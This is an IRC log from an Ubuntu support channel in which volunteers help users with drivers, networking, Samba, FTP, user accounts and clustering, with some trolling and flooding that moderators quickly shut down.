pregierHow does update-initramfs "know" what kernels match its "-k all" option?21:52
belisariusThat damn audio thing is driving me crazy21:53
rziggy_: thanks to you and all the help. i will try some things and eventually find a solution. or adobe fixes this.. eventually.21:53
ChrisSOchaHello. Hoping some nice person here can help me :) Having problems with my integrated webcam in my Dell laptop, when i try use it it dosent work (Camorama, for example, says: Could not connect to video device (/dev/video0) Please check connection). Anyone have any ideas? :)21:55
BenqHello, can anyone help? I had a Nvidia Video card, but it stopped working so i had to remove it ... after that, i'm not able to log in ubuntu using the integrated Intel graphics card, what must i do to fix this please, thanks! I'm on a live cd atm21:55
sebsebsebBenq: Did you install the propritary Nivida driver?21:56
alejandroNeed help with Ubuntu 10, Toshiba L505D, ACPI issues21:56
mneptokBenq: did you install the proprietary nVidia drivers? if so, go and uninstall them.21:56
sebsebsebBenq: if so well maybe its there still, and that isn't for Intel21:56
Benqhow? I'm only able to c the grub, after that all is black21:56
SlidingHornalejandro: just go ahead with your question.  if someone knows a solution they'll answer :)21:56
vltChrisSOcha: Does `lsusb` list the camera?21:56
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Benqand I had the nvidia drivers automatically installed in ubuntu 10.421:57
alejandroI was installing Ubuntu but it didnt boot, so I edit grub and added ACPI=HT . Q: Is that optimum for performance and funcionability ?21:57
EpikIm having trouble getting my network card to use 100mbit full duplex. My network card is ( 00:19.0 Ethernet controller: Intel Corporation 82566DC-2 Gigabit Network Connection (rev 02) ) and im using e1000e drivers. I've downloaded the latest driver from Intel, and tried setting my link speed with ethtool. None of this has provided any success. Anyone have any suggestions on how i can achieve at least 100mbit ?21:58
ikoniahave you tried foring it with ethtool or mii-tool21:58
justindisgustinanyone know what to do if I get "There is a problem with the configuration server. (/usr/lib/libgconf2-4/gconf-sanity-check-2 exited with status 256)  The desktop boots but somehow the panel looks oddly configured and the ubuntu icon (normally grey) is a [rather cool] orange circle with white icon21:59
justindisgustinalso no mouse functionality21:59
Epikwhen i change the settings with ethtool, it simply drops the connection until i revert back to 10mbit21:59
ikoniaEpik: sounds like your switch is a problem then more than your network card21:59
sebsebsebBenq: in the recovery mode,  which there should be an option for on Grub,  I belive there is still something for fixing xorg,  but I don't know if that would actsaully help.22:00
Epikikonia, there is no issue with the switch. I have anther PC running plugged into the same switch, using the same NIC on however running windows and it works fine22:00
ikoniaEpik: that doesn't mean there is no issue with the switch22:00
Epikikonia, lets assume the issue is not with the switch22:01
Epikwhat else could i try?22:01
ikoniaEpik: why ? why assume that22:01
Benqhmm ya, i'm googling how to uninstall nvidia drivers from a terminal, if that doesnt work i'll try that. thanks sebsebseb :)22:01
ikoniaEpik: the card is a sound and well supported card, you have tried to force it to correct speed and the switch drops it off the network, so therefore either a.) you are not configuring it right b.) the switch does not want to run at that speed on that port22:01
sebsebsebBenq: Ok good luck :)22:02
EpikWell, because its a Cisco 3750 that i configured myself and i can see that under show run interface that its setup to 1) auto negotiate and 2) support jumbo frames and 3) allow for 10/100/100022:02
ikoniaEpik: setting auto neg and then you forcing the card at your end won't work22:02
ikoniaEpik: you need to force it at the switch end too for that port22:02
Epiki will disable auto negotiate22:03
kmelsWhat is the default value for /desktop/gnome/session/required_components/windowmanager?22:03
Kyle__Hi.  Is there a way to not list any users on the login screen?22:03
Slartkmels: it says "metacity" on my system22:03
sebsebsebKyle__: with GDM 2,  I am not sure, but I know that other screens don't just do that22:04
kmelsSlart: cheers, I was testing xmonad yesterday and switched back to metacity but Compiz no longer listens to the keyboard shortcuts.22:04
sebsebsebKyle__: personally I like KDM with multiple accounts, for various reaons,  including how it will have the user name of the account that was last logged in showing, then just put in password, and log in22:05
Slartkmels: ehm.. ok.. and setting that fixes it?22:06
kmelsSlart: no. I'll re install the packages I guess.22:07
SlidingHornkyle__: it's been known to have problems with any distro outside of Fedora, but LXDM (display manager for LXDE) doesn't list the users...just has a text input box for you to enter the user name.  Again...it's known to not work well with ubuntu /disclaimer22:07
pregieriirc compiz keyboard shortcuts depend on how it's launched22:07
sebsebsebSlidingHorn: LXDM is not known to work well with Ubuntu?22:07
SlidingHornkyle__: last I read (which was a while ago, admittedly)22:07
SlidingHornoops  that was supposed to go to sebseb22:07
sebsebsebKyle__: LXDM is quite nice as well, but by default it will be a Lubuntu screen, saying Lubuntu on it.22:08
mneptokSlidingHorn: errr ... i think the Lubuntu team would disagree with you.22:08
DJ_HaMsTaI used to work with Single Click and UltraVNC listening application to troubleshoot other machines, UltraVNC is only for windows and now im in ubuntu. Is there a similar application that can listen for VNC requests in ubuntu ?22:08
* sebsebseb agrees with mneptok22:08
ziggy_r: no problem22:08
SlidingHornmneptok: like I said...it may not be the case anymore -- it was a while ago when I read that22:09
belisariusI give it up, I have enough of this. I can do what I want and the audio output isn't working properly. On youtube I even get no output at all or rather from the browser. If something so simple like an audio output is that hard to set up I use that HDD for backup purpose and not for linux, because who knows how hard it will become to get the rest set up right. I'm better with windows than...22:09
belisarius...with linux, so bye bye.22:09
sebsebsebKyle__: Slim won't list the users by default, and maybe if you set it up yourself to, it could.   Get it from Ubuntu repo and you get Debian theme, since Ubuntu is based on Debian.   Rather easy to change to other themes, some rather nice ones on the website,  and its very customizable doesn't seem to take much for someone to make their own theme.22:10
Kyle__OK.  Thank you.22:10
ready2screamsamba, help, r samba users diff than ubuntu users, I'm having permission problems, can read but can't write22:11
ready2screamhow can i view perms for a samba user? rtfm but not understanding it22:12
SlidingHornready2scream: in a terminal (Menu > Accessories > Terminal) navigate (cd) to the directory and type: ls -ln22:13
ready2screamthanks, the dir that i'm trying to write too?22:14
John1Hello. I wonder if there are any programs for Ubuntu to share folders /  drives between Ubuntu and Win 7 in the home network?22:14
SlidingHornready2scream: that command will show you the files within the directory you're viewing along with the permissions assigned to them22:14
neur0m4ncerHi guys - anyone know why I can't navigate to xbmc.org on any browser I try? (10.04)22:14
sebsebseb!samba | John122:14
ubottuJohn1: Samba is the way to cooperate with Windows environments. Links with more info: https://wiki.ubuntu.com/MountWindowsSharesPermanently and https://help.ubuntu.com/10.04/serverguide/C/windows-networking.html - Samba can be administered via the web with SWAT.22:14
pregierCan anyone confirm whether "update-initramfs -c -k all" is self-contradictory, since "-k all" seems to only apply to initrd's which already exist?22:15
sebsebsebJohn1: np22:15
Pandemicfoxhello irc how can i delete a saved session in ubuntu 9.10?22:15
sapersineur0ma4ncer you logged my shit, i'm a beast your face through the concret find out about me google lyrical mozart or:22:16
SlidingHorn!language | sapersi22:16
ubottusapersi: Please watch your language and topic to help keep this channel family friendly.22:16
ready2screamslidinghorn,  that woudl show for ubuntun users, but i've read that samba has it's own user list, how do i make sure my winxp machine is connecting to my samba share on ubuntu as the correct user, i looked at the log, but hard to tell. thanks22:16
ikoniasapersi: stop that now - this is your only warning22:16
sapersiokay taken apologies22:16
neur0m4ncer... so sapersi - any help with the browser issue? >:)22:17
sebsebsebneur0m4ncer: They got kicked out of the channel22:17
neur0m4ncerI know - I was being fascetious.22:18
SlidingHornok folks...heading home -- have a good night and good luck everyone :-)22:18
sapersilo siento, my apologies22:18
xxxis there a program that searches for a given string in a file?22:19
neur0m4ncerBut seruously though - if anyone knows why I'm unable to navigate to certain sites in 10.04, I'd love the help.22:19
=== xxx is now known as Guest82906
graviton_A program?22:19
graviton_Why not a command?22:19
sapersii could vavigate there and it was so random it was mad suspect22:19
WJWxxx: man grep22:19
SlidingHornxxx: grep I believe?22:19
sebsebsebneur0m4ncer:  maybe a problem with your ISP's DNS22:19
sara_qualcuno parla italiano?22:19
rottenrecmaybe your mom installed netnanny on your box22:19
kapcom01hello, any easy graphical simulator for pic16f84 microcontroller?22:19
sebsebseb!it | sara_22:19
ubottusara_: Vai su #ubuntu-it se vuoi parlare in italiano, in questo canale usiamo solo l'inglese. Grazie! (per entrare, scrivi « /join #ubuntu-it » senza virgolette)22:20
neur0m4ncerNever thought of that one sebsebseb... I gues that would be a case of getting on the phone then?22:20
sebsebsebneur0m4ncer: how long has it happended?22:20
sebsebsebneur0m4ncer: also have you tried another computer?22:20
neur0m4ncerAbout four days.22:20
sara_ok thank a lot,ubutnt.i so?22:20
neur0m4ncerI don't have another to hand, but I'll try to borrow a lappy and try tomorrow.22:20
sebsebsebneur0m4ncer: can change DNS to another one, but  useually ISP's DNS's are fine22:21
monokromeHey. I just updated Ubuntu and now my mouse is oddly sensitive22:21
neur0m4ncerI tried... was it openDNS (?) last year, but it was slower than the ISP.22:21
monokromeIf I put my hand on it, the mouse just wanders off to the left22:21
eliasson_Hi. Is there a application which enable "Windows 7 dock"-feature. E.g. draging a window to the right top corner, and it will be splitted.22:21
Epikikonia, I've verified that the port is correctly functioning by directly connecting a laptop running an inferior OS and performing a speed test. The results were allowing for 100mbit. The problem has been defined as localized to my workstation. The command im using to set my linkspeed it "sudo ethtool -s eth0 speed 100 duplex full autoneg off" do you have any further solutions that could help identify the issue?22:21
sebsebsebmonokrome: a touch pad or?22:21
monokromeIt doesn't do this in Windows, and didn't do it before the update22:22
monokromeNo, it's a mouse.22:22
ubottuEnabling extra mouse buttons: https://help.ubuntu.com/community/ManyButtonsMouseHowto  - Enabling serial mouse: https://help.ubuntu.com/community/SerialMouseHowto22:22
sebsebsebok thats useless22:22
sapersiwhat is the best Notepad++ alternative for ubuntu?22:22
ikoniaEpik: is autoneg on that switch port22:22
Epikikonia, i've tried with it both on and off22:22
sebsebsebmonokrome: system > preferences > mouse22:22
Epikikonia, currently it is back on22:22
neur0m4ncersebsebseb: I guess trying an alternate DNS would at least rule that out as a cause though - thanks for the idea.22:23
ikoniaEpik: disable it you can't have auto neg at one ned22:23
ikoniaor enable it on both ends22:23
ready2screambyebye everyone22:23
monokromesebsebseb: Maybe if I could click without the mouse wandering :D22:23
sapersiwhat is the best Notepad++ alternative for ubuntu?22:23
Epikikonia, I have tried both variations and it just wont seem to budge from 1022:23
andreligneHello! I have lost the ability to change window focus by clicking its contents on my Ubuntu 10.04. It's really annoying! Anyone know of a setting to change?22:23
sebsebseb!gedit | sapersi22:23
ubottusapersi: Text Editors: gedit (GNOME), Kate (KDE), mousepad (Xfce4) - Terminal-based: nano, vi/vim, emacs - For HTML/CSS editors, see !html - For programming editors and IDE, see !code22:23
sebsebseb!best | sapersi22:23
ubottusapersi: Usually, there is no single "best" application to perform a given task. It's up to you to choose, depending on your preferences, features you require, and other factors. Do NOT take polls in the channel. If you insist on getting people's opinions, ask BestBot in #ubuntu-bots.22:23
sebsebsebsapersi: I think you can even Wine Notepad++22:24
monokrometurning down accelleration helps, but it doesn't resolve the issue.22:24
ikoniaEpik: I understand that but you've got to keep it consistant. Have you looked at the syslog (while autoneg is on at both ends) to see what happens when the network is brought up22:24
monokromeIt even wanders when I'm not moving it rofl22:24
aethelricksapersi: I use Vim, Gedit and Jedit on ubuntu for editing code22:25
icerootsapersi: vim and emacs22:25
icerootsapersi: if you are talking about "best editors"22:25
sebsebsebmonokrome: ok if you click on system,  you can then navigate the menus using the arrow keys22:25
sebsebsebmonokrome: and then hit enter when you got mouse22:25
Epikikonia, I guess i should have been watching the syslogs instead of the GUI notification22:25
Epikapparently it has been switching :\22:26
Epikthanks for your help22:26
ikoniathere we go then22:26
rottenrecwhy does sudo get rid of my pretty colors when i do grep /var/log/* ?22:26
adnyxoim having some trouble with kubuntu and my nvidia graphics card, i installed the drivers using the bundled utility, but when i rebooted i was greeted with a command line. when attempting to startx, it says there are no displays. can anyone give me some advice?22:26
icerootrottenrec: because bashrc from root is taking if using sudo and not your bashrc22:26
Epikrottenrec,  your profile changes22:26
aethelricksapersi: I find JEdit to be best for large projects with a bunch of files open because it's got a load of handy plugins available. I like Vim from the command line for editing config files and I use Gedit for one off edits to scripts etc because it starts faster the Jedit22:26
rottenreci see22:26
rottenrecthanks guys22:26
monokromesebsebseb: Yea. Nothing there helps.22:28
sebsebsebmonokrome: uhmm well  I don't think there is a difference between distro for this, but on mine, I got  pointer speed options,  Accerlation and Sensitivity22:29
Roastedis there a way to tell who is currently connected to your web server?22:29
microlithRoasted: look at the access logs22:30
sebsebsebRoasted: website statistics22:30
Roastedsebsebseb, website stats? where at?22:30
sebsebsebRoasted: you would have to install some yourself22:30
monokromesebsebseb: I have both of those, too. I turn them all down and it still does it.22:30
Roastedsebsebseb, any you recommend>?22:30
monokromeIt's a software issue because it didn't happen until I updated.22:30
sebsebsebRoasted: thats a bit off topic, but there are loads of them out there22:30
sebsebsebmonokrome: from 9.10 to 10.04?22:31
Roastedsebsebseb, I don't really understand how it's off topic considering it's a question directly relating to my Ubuntu desktop. Is there any that you'd recommend?22:31
monokromesebsebseb: No, I was already in 10.04 and just ran an apt-get update && apt-get upgrade22:31
monokromeInstalled this OS 2 days ago22:31
sebsebsebRoasted: I can't think of any names now, maybe theres one called webstats or something,  Google or something, or uhmm even better  search sf.net and I guess freshmeat.net as well22:31
caacgtg, peace out22:31
Roastedsebsebseb, thank you.22:32
DevrethmanIs there a way to make connected drives not show up on the desktop?22:32
sebsebsebRoasted: ok np22:32
sebsebsebRoasted: also quite basic or whatever, but22:32
sebsebsebRoasted: Google Anaylastists or whatever its called22:33
sebsebsebRoasted: you have the account with them, and then put a bit of code on your webpages, for the stats22:33
Roastedsebsebseb, never heard of it, but I'll check up on it and see what I can find.22:33
sebsebsebRoasted: however you can install better stats yourself, on your own web server22:33
Roastedsebsebseb, I'd just like to see who's connected to my web server. I don't host much of anything off of it besides dumping stuff there and linking friends tod ownload it (sort of like ftp, but not)22:33
sebsebsebRoasted: well as long as you got PHP and MySQL and such I guess22:33
sebsebsebRoasted: there are access logs as someone suggested22:34
Ginbun2what is the command to launch gnome mixer?22:34
Roastedsebsebseb, yeah, I'm scanning the log directory now. I was just curious if there was a web based solution, like I log in to my web server via firefox and see connected clients and if theyre downloading a larger package, how fast it's going, etc.22:34
sebsebsebRoasted: I guess there are things you can install on to the server for that22:35
neur0m4ncersebsebseb: DNS has no effect - anything else you could recommend?22:35
sebsebsebneur0m4ncer: nope,  except try another computer as I mentioned earlier, and still problems can contact ISP22:35
CppIsWeirdi have a wireless connection on a xubuntu laptop. every time the wireless disconnects it stays disconnected. i think this is because i never created a password store. how do i initiate that process?22:36
neur0m4ncerOkey doke - thanks.22:36
monokromesebsebseb: I know it's not the mouse because the mouse has a sensitivity changes built into it and it doesn't change the sensitivity of the mouse "wandering"22:36
monokromeAlso, it doesn't happen in Windows22:36
Stokenoin #ubuntu-de22:36
sebsebsebmonokrome: right yeah, but not happening in Windows isn't that relivant22:36
sebsebsebmonokrome: except for knowing  the hardware still works22:36
monokromeWhich is relative to me support the fact that it's a Ubuntu/software issue22:37
wildbatneur0m4ncer, you can try that's google's DNS22:37
sebsebsebmonokrome: useually installing updates and such go fine,  sadly at the moment, you can't just revert an installed update,  but it seems  maybe the next release  or the one after,  people will be able to do stuff like that, since btrfs.  Which might be the default file system for 10.10 if its stable enough.22:38
* monokrome doesn't want to have to code Python in Windows :(22:38
sebsebsebmonokrome: try the Live CD?22:38
sebsebsebmonokrome: got a Live CD of 10.04?22:38
monokromeworks in the live CD22:38
neur0m4ncerwildbat: thanks - I can get to all of my usual sites, just not to xbmc.org - weird, huh? So I've just dug out an old POS lappy that has been sitting unused for a couple years, but should work over Ethernet - and it's XP too. I'll see if that can find it.22:39
monokromeLike I said, I installed the OS 2 days ago and updated today22:39
monokrometodays update broke it22:39
tmasI have a large USB hard drive I want to install ubuntu on, but my BIOS doesn't support booting from USB. Is there a way I can get around that and boot it (possibly use GRUB on the main drive)?22:39
sebsebsebmonokrome: first version of Ubuntu or?22:39
monokromesebsebseb: What?22:39
sebsebsebmonokrome: well the install isn't that old, so why not just clean install?22:40
russell_simmons       _                 _22:40
russell_simmons _   _| |__  _   _ _ __ | |_ _   _22:40
russell_simmons| | | | '_ \| | | | '_ \| __| | | |22:40
russell_simmons| |_| | |_) | |_| | | | | |_| |_| |22:40
russell_simmons \__,_|_.__/ \__,_|_| |_|\__|\__,_|22:40
FloodBot2russell_simmons: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.22:40
monokromesebsebseb: Because I have done all of my configuration for my apps22:40
tertl3russell_simmons: that was uncalled for22:40
CppIsWeirdi have a wireless connection on a xubuntu laptop. every time the wireless disconnects it stays disconnected. i think this is because i never created a password store. how do i initiate that process?22:41
russell_simmonssorry guys22:41
russell_simmonsthought spelling ubuntu in big letters would be cool seeing as i really love the product22:41
sebsebsebmonokrome: thats another issue they are going to try and solve soon it seems.   So people can easilly reinstall with things set up how it was before.  However yeah this isn't the future yet, so can't really help you, maybe someone else can later on though.22:41
russell_simmons/bin/sh: it: command not found22:42
russell_simmonswhat the heck22:42
russell_simmonssorry about that22:42
russell_simmons _ _                    _22:42
russell_simmons(_) |_   ___ _   _  ___| | _____22:42
russell_simmons| | __| / __| | | |/ __| |/ / __|22:42
russell_simmons| | |_  \__ \ |_| | (__|   <\__ \22:42
russell_simmons|_|\__| |___/\__,_|\___|_|\_\___/22:42
FloodBot2russell_simmons: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.22:42
monokromeAt least russell_simmons has a funny name?22:42
monokromeMeh. I'll just code in Windows then.22:42
russell_simmons  __            _                    _ _22:42
russell_simmons / _|_   _  ___| | __  _   _    __ _| | |22:42
russell_simmons| |_| | | |/ __| |/ / | | | |  / _` | | |22:42
russell_simmons|  _| |_| | (__|   <  | |_| | | (_| | | |22:42
russell_simmons|_|  \__,_|\___|_|\_\  \__,_|  \__,_|_|_|22:42
FloodBot2russell_simmons: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.22:42
LjL!ops | russell_simmons22:42
ubotturussell_simmons: Help! Channel emergency! (ONLY use this trigger in emergencies) -  elky, Madpilot, tritium, Nalioth, tonyyarusso, PriceChild, Amaranth, jrib, Myrtti, mneptok, Pici, jpds, gnomefreak, bazhang, jussi, Flannel, ikonia, maco, h00k, IdleOne, or nhandler!22:42
Roastedha. wow.22:42
sebsebsebLjL: beat me to it22:42
Roastedperma ban22:42
neur0m4ncerWell that proves it - XP can't get to the site either. I think a standing up phone call to VirginMedia is on its way. Thanks for all the suggestions.22:43
tertl3that guy was a jerk22:43
LjLlet's move on22:43
Socket_77Hello, I was doing a do-release-upgrade from karmic 9.10 to lucid 10.04 server and my ssh connection died.  It was almost finished and at the point where it was going to remove 81 packages22:43
Socket_77How can I restart this?22:43
magnetronSocket_77: try running dpkg and see if it reports any errors22:44
tmasI have a large USB hard drive I want to install ubuntu on, but my BIOS doesn't support booting from USB. Is there a way I can get around that and boot it (possibly use GRUB on the main drive)?22:44
trev_I am trying to run an old fortran problem and am having some compiler difficulties, can any of you suggest any fortran compilers apart from gfortran, ifort?22:44
wildbattmas, you need plop22:45
Socket_77magnetron: ok, which dpkg command?22:45
tmaswildbat: plop?22:45
fadeinI use UNE Lucid and wish to run syndaemon with my own args. It's being started for me when I log in to GNOME.  So I now have two syndaemons running. Can I stop GNOME/X/whoever from launching it?22:45
wildbattmas, http://www.plop.at/22:46
magnetronSocket_77: you could try installing any small package with aptitude and see if it succeds22:46
PhoenixSTFhey guys how r u?22:46
tmaswildbat: how is another linux distro going to help me?22:46
wildbattmas, i got a bootloader that can boot your usb w/o BIOS support22:47
sebsebsebwildbat: Plop is an Austrain Linux distro?22:47
Socket_77magnetron: ok, I installed htop sucessfully22:47
wildbattmas, check in its bootmanager section22:47
tmaswildbat: never mind, found the boot manager on the plop page. Thanks!22:47
sebsebsebtmas: whats plop?22:48
wildbatsebsebseb, no idea the origin of it22:48
sebsebsebwildbat: well .at is Austria22:48
tmassebsebseb: a linux distro and boot manager, I guess. I've never heard of it 'till now, but I'm going to carry a cd with the boot manager with my everywhere I go from now on, really useful!22:49
wildbatsebsebseb, may ~ but anyone can use .at ~.tw .hk ;p22:49
sebsebsebtmas: yeah same here not heard of it before either, so i'll check out website now as well then22:49
CppIsWeirdi have a wireless connection on a xubuntu laptop. every time the wireless disconnects it stays disconnected. i think this is because i never created a password store. how do i initiate that process?22:49
CppIsWeirdi have a wireless connection on a xubuntu laptop. every time the wireless disconnects it stays disconnected. i think this is because i never created a password store. how do i initiate that process?22:49
CppIsWeirdi have a wireless connection on a xubuntu laptop. every time the wireless disconnects it stays disconnected. i think this is because i never created a password store. how do i initiate that process?22:49
CppIsWeirdi have a wireless connection on a xubuntu laptop. every time the wireless disconnects it stays disconnected. i think this is because i never created a password store. how do i initiate that process?22:49
FloodBot2CppIsWeird: Please don't flood, use http://paste.ubuntu.com to paste, don't use Enter as punctuation.22:49
CppIsWeirdi have a wireless connection on a xubuntu laptop. every time the wireless disconnects it stays disconnected. i think this is because i never created a password store. how do i initiate that process?22:49
LoRezCppIsWeird: seriously, wtf?22:50
tmasYeah. Really.22:50
mneptokCppIsWeird: if that was a mistake, ensure you do not repeat it.22:50
sebsebsebLoRez: language, but yeah  what was that22:50
LoRezfrak is a language problem now?22:50
sebsebsebLoRez: the three letters like that are in this channel22:51
tmash00k: Why don't you want to by operator?22:52
mneptoktmas: such questions are offtopic.22:52
sebsebsebh00k:  oh you kicked him,  when it may have just been some sort of mistake22:52
=== XFGoldenBBL is now known as XFGolden
tmasmneptok: sorry, I just started to get annoyed by the constant noise coming from my IRC client.22:53
mneptoktmas: then this channel is not someplace you want to be.22:53
monokromesebsebseb: It just randomly stopped.22:53
sebsebsebtmas: you can turn off the join and parts and such22:54
sebsebsebmonokrome: the floodbot stopped it22:54
Socket_77magnetron: Is it not possible to restart the do-release-upgrage?22:54
pHcFhey guys22:54
monokromesebsebseb: My mouse wandering just randomly stopped.22:54
pHcFguys, how do i block a command for a user?22:54
pHcFlike ping, or nmap?22:54
tmasmneptok: My client only tells me when a message has my nick in it or when someone's status changes.22:54
sebsebsebmonokrome: ok :)22:54
sebsebsebok good :)22:54
Guest54152pHcF, use ignore22:54
pHcFGuest54152: how?22:55
monokromeThanks for helping, sebsebseb22:55
sebsebsebmondragon: well trying to yeah, but thing is22:55
sebsebseboh to late they left22:55
Guest54152pHcF, /ignore22:55
sebsebsebhowever yeah their issue might come back22:55
justindisgustinI'm using an aspire one and have lost trackpad functionality.  any ideas?22:56
chromeanyone else having problems with flash after the latest updates?22:56
LjLGuest54152: how will /ignore help him?22:56
PhoenixSTFanybody knows about CLustering?22:56
pHcFGuest54152: ignore?22:56
Guest54152to ignore users22:57
LjLpHcF: i'm not sure there is an easy way to block a command for a specific user... however, you can make it executable only for members of a specific group, or something22:57
n2diyPhoenixSTF: I've studied it briefly, recently.22:58
Y3Nhi, want to build an OS, but I do not know how to load kernel hello world. can give me a site with tutorials or tell me how do I send to the kernel of boot.bin22:58
Y3Npls help22:58
pHcFLjL: oh, gotcha22:58
magnetronpHcF: you could use sudo to restrict a command for a specific user22:58
pHcFany example or links?22:58
Guest54152pHcF, ignore users by typing /ignore ...22:59
PhoenixSTFn2diy: yes well i would like to it at home got some machines on the corner22:59
h00kY3N: I don't think this is going to be the right place to ask.  Try in ##linux I suppose.22:59
LjLGuest54152: pHcF never asked how to ignore users, however, i believe.22:59
lyalhaCould someone help me create a persistent live usb of ubuntu that stores /tmp in the pc's ram? (think i worded that right..)22:59
n2diyPhoenixSTF: Same deal here, five boxes, and only two of them are doing anything.22:59
xompcould someone tell me how to make an existing user account not have permission to change anything outside of it's own directory?23:00
PhoenixSTFn2diy: same here 5 almost 6 now!23:00
erUSULxomp: do not let that account use sudo ?23:01
tle_can anyone help me with a problem I'm having with VirtualBox?23:01
sebsebseb!details | tle_23:01
ubottutle_: Please give us full details. For example: "I have a problem with ..., I'm running Ubuntu version .... When I try to do ..., I get the following output: ..., but I expected it to do ..."23:01
xomperUSUL: I have a Linode VPS running ubuntu and had added a user for a server program to run. I would like to make sure that user account is locked to a specific directory.23:01
Guest54152LjL, he asked to block users23:01
tle_ubottu: I'm having issues with keyboard input. For instance while trying to install 10.04 in a VM I get the boot menu and can move around but pressing Enter does nothing23:01
ubottuError: I am only a bot, please don't think I'm intelligent :)23:01
LjLGuest54152: err, yes, from executing commands like 'ping' or 'nmap' he said... i.e. local users on his system ;)23:02
tle_Alright then, in VirtualBox I'm having issues with keyboard input. For instance while trying to install 10.04 in a VM I get the boot menu and can move around but pressing Enter does nothing23:02
PhoenixSTFn2diy: where do i start m8 i read something about the PXE for booting and some proccess sharing program23:02
sebsebsebtle_: a vm with what host OS?23:02
tle_sebsebseb: Mint23:03
sebsebsebtle_: oh23:03
erUSULxomp: system users (the ones you add for server programs) do not have home nor a login shell nor password... that way nobody can log with that username23:03
n2diyPhoenixSTF: I'd start with synaptic, I came across so clustering sw in there, but don't have the details handy at the moment.23:03
sebsebsebtle_: thats sort of interesting I find, Mint as host, Ubuntu in vm. better the other way round really though :)  anyway uhmmm try #vbox for your issue, good luck23:03
xomperUSUL: I'm pretty sure I can login to my VPS via SSH using the new user account I created with "adduser user" lol23:03
tle_sebsebseb: thanks23:04
xomperUSUL: I'm also pretty sure I can "cd /home/user" and write/delete from it :P23:04
erUSULxomp: you should have used the --system switch23:04
erUSULxomp: sudo adduser --system whatever23:04
sapersii used geany from the synaptics package manger,t hank you sir23:04
xomperUSUL: what does --system do exactly? Is it too late to alter the existing user account at all?23:05
PhoenixSTFn2diy: have you heard of PVm or MPI, and also LTSP?23:05
justindisgustinI'm using an aspire one and have lost trackpad functionality.  any ideas?23:06
erUSULxomp: read the fine adduser manpage :) it is placed in nogroup group with shell pinting to /bin/false (and logins disabled)23:06
chromePhoenixSTF: What kind of clustering you do depends on the application.23:06
PhoenixSTFchrome i think vm mostly23:07
xomperUSUL: but I need to have logins enabled so that I can stop/start/restart the processes from time to time heh.23:07
magnetronxomp: no need. you can use su for that23:07
PhoenixSTFchrome: what applications can we run? besides vm?23:07
n2diyPhoenixSTF: LTSP, yes, the others I'm not sure of. I spent a good deal of time in synaptic last week, checking out each package, not quit down yet either, currently I'm in the "Ws"23:07
xompmagnetron: oh I completely forgot about su!!23:07
chromePhoenixSTF: Anything, but how it is clustered changes the design generally23:07
davidmatthewi got a emachine em250, currently i can't get the mic to work and that is both the built in mic and the mic jack23:08
chromePhoenixSTF: Clustering generally means having fail-over, and things like Heartbeat are perfect for that23:08
uLinuxNeed help deleting some shortcuts (that dont delete)23:08
magnetronuLinux: explain the problem to the channel23:08
PhoenixSTFchrome: like for apache and stuff?23:08
chromePhoenixSTF: but like I said, it depends what you want to "cluster"23:08
PhoenixSTFi whant processing power and memory23:09
n2diyPhoenixSTF: I thought LTSP was a long term support project, at first glance.23:09
uLinuxI uninstalled Wine .. then I deleted Wine shortcut but then it moved some shortcuts to Other menu23:09
xompmagnetron: is it possible to change an already existing user account to this --system thing that erUSUL mentioned?23:09
chromePhoenixSTF: a typical design for apache would be to have n+1 number of apache servers, sitting behind "load balancers", ideally hardware load balancers, but you can get away with a pair of machines running heartbeat and balance.23:09
PhoenixSTFn2diy:sorry my bad https://help.ubuntu.com/community/UbuntuLTSP/LTSP-Cluster23:09
erUSULxomp: usermod ?23:09
magnetronxomp: yes.23:09
chromeLTSP is the Linux Terminal Server Project, its not a clustering system per se, though it can help with building cluster nodes that are diskless.23:10
xomperUSUL: usermod? sorry I'm not very familiar with linux that much heh23:10
uLinuxi hate these bugs23:10
erUSULxomp: is a command similar to adduser that lets you edit existing accounts23:10
tucemiuxanyone knows how to make the wireless applet reappear?23:10
erUSULxomp: man usermod23:10
xomperUSUL: ok thanks23:10
erUSULtucemiux: alt + f2 --> run nm-applet23:11
uLinuxI can hide those shortcuts but can't deleter23:11
PhoenixSTFchrome: well im not doing any apache for now so resouce sharing (processing, memory, etc) is the way to go for me right now23:11
PhoenixSTFchrome: and yes bootless nodes is also a way to go, for old machines without HDD or for having the latest kernel alive!23:12
chromePhoenixSTF: thats a different kind of cluster, and generally applications need to be designed to work with that kind of cluster.23:12
n2diyPhoenixSTF: Don't think I can play with that, now 64 bit cpus here.23:12
chromePhoenixSTF: I don't think the idea you have of clustering is actually what it is.23:12
chromePhoenixSTF: What you want to look at for what your idea of clustering is, is Beowulf23:12
tucemiuxerusul, im running applet in command line,  it wont restart, DEBUG: old state indicates...23:12
chromebut its not really useful for general computing.23:12
brickyman transmission is buggy for some reason all the sudden23:12
Usuario305hello.. i have some problem when using ftp from terminal it says 425 Could not open data connection to port 38353: No route to host when i try to ls on the ftp server.. but if i use an gui ftp client it works fine.. anyone know what might be wrong?23:13
PhoenixSTFchrome: beowulf yes its good but how can i use ubuntu server with that?23:13
magnetronUsuario305: set your client to use "passive mode"23:13
chromeI have no idea.23:13
PhoenixSTFchrome: or how can i set up one23:13
Usuario305quote PASV?23:13
chromePhoenixSTF: you need to think about WHAT it is you are actually trying to achieve23:13
pregierPhoenixSTF, every cluster is different, and the cardinal rule for these questions is usually "it depends on the application"23:14
magnetronUsuario305: it needs client support. depends on the client on how you enable it23:14
Usuario305i am using ftp from terminal23:14
chromePhoenixSTF: If you want to plug two machines together and have a "machine" that is the sum of all the resources, and expect a program to transparently migrate between the two machines as if it was two seperate CPUs, then you're misunderstanding what most clusters are.23:14
=== richard is now known as Guest30628
Usuario305i typed quote PASV and it says 227 Entering Passive Mode (195,74,38,22,91,252)  but still  i get same message when ls23:14
PhoenixSTFchrome: example! i got a few machines and wanted to run Virtual machines to run renders, or any type of aplication the user wants thruu the virtual machine23:14
magnetronUsuario305: pass the -p switch when starting ftp. " ftp -p server etc.etc."23:15
erUSULUsuario305: try lftp ?23:15
Usuario305ok thanks mangetron23:15
PhoenixSTFchrome: and that is not a cluster?23:15
xomperUSUL: looking at the man page for usermod, I'm starting to think it may be simpler for me to just create a new user with the --system switch like you mentioned and just cp all the files over haha23:15
uLinuxno one helps cya23:15
Usuario305it worked now.. thanks23:16
magnetronUsuario305: "quote" just passes commands to the SERVER not the client. that's why i said you need to use client specific commands.23:16
chromePhoenixSTF: thats not how clusters work23:16
